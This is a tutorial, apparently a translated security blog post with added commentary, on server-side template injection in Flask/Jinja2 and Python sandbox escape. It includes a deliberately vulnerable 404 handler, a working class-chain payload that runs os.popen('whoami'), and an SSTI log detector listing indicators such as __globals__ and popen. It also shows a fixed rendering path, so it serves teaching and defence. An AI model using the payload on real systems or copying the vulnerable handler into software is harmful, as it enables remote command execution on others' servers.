0x00 SSTI principle
Template injection works on the same principle as SQL injection and command injection: when user input is not handled properly, the data inserted into the template becomes part of the program itself and changes the logic that is executed.
0x01 Sandbox escape principle
Sandbox
Originally a sandbox was used to test suspicious software such as viruses and judge how harmful they are. Run inside the sandbox, even a virus that does serious damage poses no threat to the real environment. It is similar in spirit to using a virtual machine.
Built-in functions
When the Python interpreter starts, many functions are already available even before you create any variable or function; these are Python's built-in functions.
-
Namespace: a mapping from names to objects
1. Built-in namespace: Python's own names, created when the interpreter starts; it stores the built-in names
2. Global namespace: created when a file is executed; it stores the names defined at file level
3. Local namespace (may not exist): created during execution of the file when a function is called; it stores the names defined inside the function
-
Loading order
Built-in namespace -> global namespace -> local name space
-
Name lookup order
Local namespace -> global namespace -> built-in namespace
The dir() function displays the attributes of an object; called without an argument it lists the names in the current environment, including imported modules.
View the contents of __builtins__
Class inheritance
In Python, once you obtain the class object of a variable through the attribute of its type, there are three attributes that expose the class inheritance relationship:
__base__: gets one base class of the object, normally object
__mro__: gets the base classes of the object as a sequence showing the whole inheritance chain; object is at the very bottom and therefore last in the sequence, so it can be obtained with __mro__[-1]
__subclasses__(): the subclasses that inherit from this object, returned as a list
Magic functions
__dict__
__globals__
__getattribute__()
0x02 Test code
After setting up Flask I could not reproduce the vulnerability with my own environment at first; reading master Cai's article I learned that request.url can no longer be passed into the template, because the latest version of Flask automatically URL-encodes request.url. Passing the parameter through request.args works instead.
```python
from flask import Flask
from flask import request
from flask import config
from flask import render_template_string

app = Flask(__name__)
app.config['SECRET_KEY'] = "flag{SSTI_123456}"


@app.route('/')
def hello_world():
    return 'Hello World!'


@app.errorhandler(404)
def page_not_found(e):
    # The user-controlled 404_url parameter is spliced into the template
    # source with %-formatting before rendering: this is the SSTI sink.
    template = '''
{%% block body %%}
<div class="center-content error">
<h1>Oops! That page doesn't exist.</h1>
<h3>%s</h3>
</div>
{%% endblock %%}
''' % (request.args.get('404_url'))
    return render_template_string(template), 404


if __name__ == '__main__':
    app.run(host='0.0.0.0', debug=True)
```
In the code above, the user-controlled parameter request.args.get('404_url') is rendered directly as part of the template and returned in the page. This is not the correct way to render, and it produces a template injection (SSTI).
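To show the fix beside the bug, here is an added example (not code from the original post) that renders the same 404 body two ways with Jinja2, the template engine behind Flask's render_template_string. The vulnerable path splices the user value into the template source exactly as the handler above does; the fixed path keeps the source static and hands the value to the engine as a context variable, so it is treated as data and, with autoescaping on, HTML-escaped as well. The helper names render_vulnerable, render_fixed and h3_text are my own.

```python
# Added example: vulnerable vs. fixed rendering of the post's 404 body.
from jinja2 import Environment

# Constructed user input: the probe the post uses to confirm SSTI.
PROBE = "{{1-1}}"

# Static template source. In Flask the same thing is achieved with
# render_template_string(SAFE_SOURCE, url=value), never with %-formatting.
SAFE_SOURCE = """{% block body %}
<div class="center-content error">
<h1>Oops! That page doesn't exist.</h1>
<h3>{{ url }}</h3>
</div>
{% endblock %}"""

env = Environment(autoescape=True)


def render_vulnerable(user_value: str) -> str:
    """Mirrors page_not_found: the user value becomes template *source*."""
    source = SAFE_SOURCE.replace("{{ url }}", user_value)
    return env.from_string(source).render()


def render_fixed(user_value: str) -> str:
    """The user value is a context variable; Jinja never evaluates it."""
    return env.from_string(SAFE_SOURCE).render(url=user_value)


def h3_text(html: str) -> str:
    """Helper: return the text between the <h3> tags for comparison."""
    start = html.index("<h3>") + len("<h3>")
    return html[start:html.index("</h3>", start)]


if __name__ == "__main__":
    print("vulnerable:", h3_text(render_vulnerable(PROBE)))  # 0, the expression ran
    print("fixed:     ", h3_text(render_fixed(PROBE)))       # {{1-1}}, literal text
```

In the fixed version the probe comes back as the literal string {{1-1}}, and markup such as <b> is escaped to &lt;b&gt;, which is why passing user data as a variable rather than as template source is the actual fix for this class of bug.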
0x03 Exploitation method
Traverse from a variable -> its object -> base class -> subclasses -> the global variables of a subclass's method, until the desired module or function is found.
-
__class__
Returns the class an object belongs to
-
__bases__
Returns a tuple of the classes a class directly inherits from
-
__base__
Returns the class a class directly inherits from
-
__mro__
Returns the method resolution order
-
__subclasses__()
Gets all subclasses of a class
-
__init__
Every class comes with an __init__ method, which serves as a springboard for reaching __globals__
-
__globals__
Gets the namespace of the module a function lives in, i.e. all variables and methods available there
When we request http://192.168.0.103:5000/123?404_url={{1-1}}, the page returns 0 rather than 1-1, showing that the value of 404_url is spliced into the template and rendered.
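The attributes listed above, exercised on a small class hierarchy constructed for this added example (not code from the original post), so it is clear what each lookup returns and why any function's __init__.__globals__ hands back the whole module namespace. The class names Base, Child and GrandChild and the helper functions are my own.

```python
# Added example: what __class__, __bases__, __base__, __mro__, __subclasses__()
# and __init__.__globals__ return on a constructed hierarchy.
import os  # imported only so it shows up in the module globals below


class Base:
    pass


class Child(Base):
    def __init__(self):
        self.value = 1


class GrandChild(Child):
    pass


def inheritance_facts() -> dict:
    """Collect the inheritance-related lookups for a GrandChild instance."""
    obj = GrandChild()
    return {
        "class": obj.__class__.__name__,                      # class of the instance
        "bases": [c.__name__ for c in GrandChild.__bases__],  # direct parents (tuple)
        "base": GrandChild.__base__.__name__,                 # first direct parent
        "mro": [c.__name__ for c in GrandChild.__mro__],      # method resolution order
        "root_is_object": GrandChild.__mro__[-1] is object,   # object is always last
        "subclasses_of_base": [c.__name__ for c in Base.__subclasses__()],
    }


def globals_reachable_from_init() -> bool:
    """A function defined in this module carries a reference to the module's
    globals, so reaching any class's __init__ is enough to reach everything the
    module imported (here: os). This is the hop the chain in the post relies on."""
    g = Child.__init__.__globals__
    return g is globals() and g["os"] is os


if __name__ == "__main__":
    for k, v in inheritance_facts().items():
        print(f"{k}: {v}")
    print("os reachable via Child.__init__.__globals__:", globals_reachable_from_init())
```

The defensive reading of this: once template expressions can be evaluated, there is no meaningful boundary between "string formatting" and "code execution", because every object exposes this chain. The only reliable control is to keep user data out of the template source.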
```python
"".__class__  # get a class
"".__class__.__mro__[1]
# or
"".__class__.__bases__  # get the object base class
"".__class__.__mro__[1].__subclasses__()  # get all of its subclasses
"".__class__.__mro__[1].__subclasses__()[1].__init__.__globals__  # look for the os module or other ways to read/write files
```
By brute-forcing the index number with Burp Suite, another built-in class can be found whose globals give access to the os module:
```python
"".__class__.__mro__[1].__subclasses__()[303].__init__.__globals__["os"]["popen"]("whoami").read()  # execute a system command
```
0x04 Common ways of executing commands in Python
os.system()
os.system(command)
Returns the result of executing the command as a return value: 0 on success, -1 on failure. It does not return the command's output.
os.popen()
os.popen(command[, mode[, bufsize]])
With the popen method, p.read() gets the terminal output, and close() must be called afterwards.
subprocess
- subprocess.call("command")
- subprocess.Popen("command")
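The three mechanisms listed above, wrapped so that the return value of each is visible, as an added example (not code from the original post). The command is the running Python interpreter printing a marker, so the block works on any machine; the wrapper names run_system, run_popen and run_subprocess are my own.

```python
# Added example: return values of os.system, os.popen and subprocess.run.
import os
import shlex
import subprocess
import sys

# Constructed command: print a marker and exit with status 0.
ARGV = [sys.executable, "-c", "print('marker')"]
CMD = " ".join(shlex.quote(a) for a in ARGV)  # shell string for os.system / os.popen


def run_system() -> int:
    """os.system: returns only the exit status; output goes to the terminal."""
    return os.system(CMD)


def run_popen() -> str:
    """os.popen: output is read from the pipe, then close() releases it."""
    p = os.popen(CMD)
    out = p.read()
    p.close()
    return out.strip()


def run_subprocess() -> tuple:
    """subprocess.run with an argv list: no shell is involved, so arguments are
    never re-parsed; return code and captured stdout come back together."""
    r = subprocess.run(ARGV, capture_output=True, text=True)
    return r.returncode, r.stdout.strip()


if __name__ == "__main__":
    print("os.system status:", run_system())
    print("os.popen output:", run_popen())
    print("subprocess.run:", run_subprocess())
```

One caveat when reading the subprocess lines above: subprocess.call("command") with a plain string and the default shell=False tries to execute a program literally named "command"; pass an argv list as in run_subprocess, and avoid shell=True unless the string is fully under your control.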
0x05 Bypass
The main points are:
- Filtering quotes
- Filtering brackets
- Filtering parentheses
- Filtering keywords
- Filtering {{}}
- Filtering dots
- Crippled (stripped-down) modules
Master Cai's article covers these in great detail and is worth reading:
https://xz.aliyun.com/t/6885#toc-3
Reference link: https://www.anquanke.com/post/id/188172#h3-3
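Since every filter in the list above has known bypasses, a keyword blacklist in the application is not a fix; the fix is the rendering change. What such a list is good for is detection. The following added example (not code from the original post) scans constructed access-log lines for the template delimiters and introspection attributes this post uses, after URL-decoding the request, since the post notes that Flask now URL-encodes request.url. The indicator list, the sample log lines and the function names are my own.

```python
# Added example: flag requests whose query string carries SSTI indicators.
import re
from urllib.parse import unquote_plus

# Indicators drawn from the post: expression/statement delimiters, the
# introspection attributes of the chain, and names used to reach os.
INDICATORS = [
    r"\{\{", r"\}\}", r"\{%", r"%\}",
    r"__class__", r"__mro__", r"__bases?__", r"__subclasses__",
    r"__init__", r"__globals__", r"__builtins__", r"__getattribute__",
    r"\bpopen\b", r"\bsystem\b", r"\bimport\b",
]
_PATTERN = re.compile("|".join(INDICATORS))

# Constructed sample access-log lines (not real traffic); line 2 is the
# post's {{1-1}} probe URL-encoded, line 3 the start of the class chain.
SAMPLE_LOG = """\
192.168.0.1 - - [01/Jan/2024:00:00:01 +0000] "GET /123?404_url=missing-page HTTP/1.1" 404 180
192.168.0.1 - - [01/Jan/2024:00:00:02 +0000] "GET /123?404_url=%7B%7B1-1%7D%7D HTTP/1.1" 404 160
192.168.0.1 - - [01/Jan/2024:00:00:03 +0000] "GET /123?404_url=%22%22.__class__.__mro__ HTTP/1.1" 404 400
192.168.0.1 - - [01/Jan/2024:00:00:04 +0000] "GET /static/app.css HTTP/1.1" 200 2048
"""
_REQ = re.compile(r'"(?:GET|POST) (\S+) ')


def ssti_indicators(path: str) -> list:
    """Decode the request path (twice, to catch double-encoding) and return
    the distinct indicator strings found in it, sorted."""
    decoded = unquote_plus(unquote_plus(path))
    return sorted(set(m.group(0) for m in _PATTERN.finditer(decoded)))


def scan_log(text: str) -> list:
    """Return (line_number, indicators) for every request that matches."""
    hits = []
    for n, line in enumerate(text.splitlines(), start=1):
        m = _REQ.search(line)
        if not m:
            continue
        found = ssti_indicators(m.group(1))
        if found:
            hits.append((n, found))
    return hits


if __name__ == "__main__":
    for n, found in scan_log(SAMPLE_LOG):
        print(f"line {n}: {found}")
```

Treat a hit as a trigger to look at the handler that rendered the request, not as proof of exploitation: a successful attempt that used one of the bypasses above may carry none of these indicators, which is exactly why the rendering fix, not the filter, is the control.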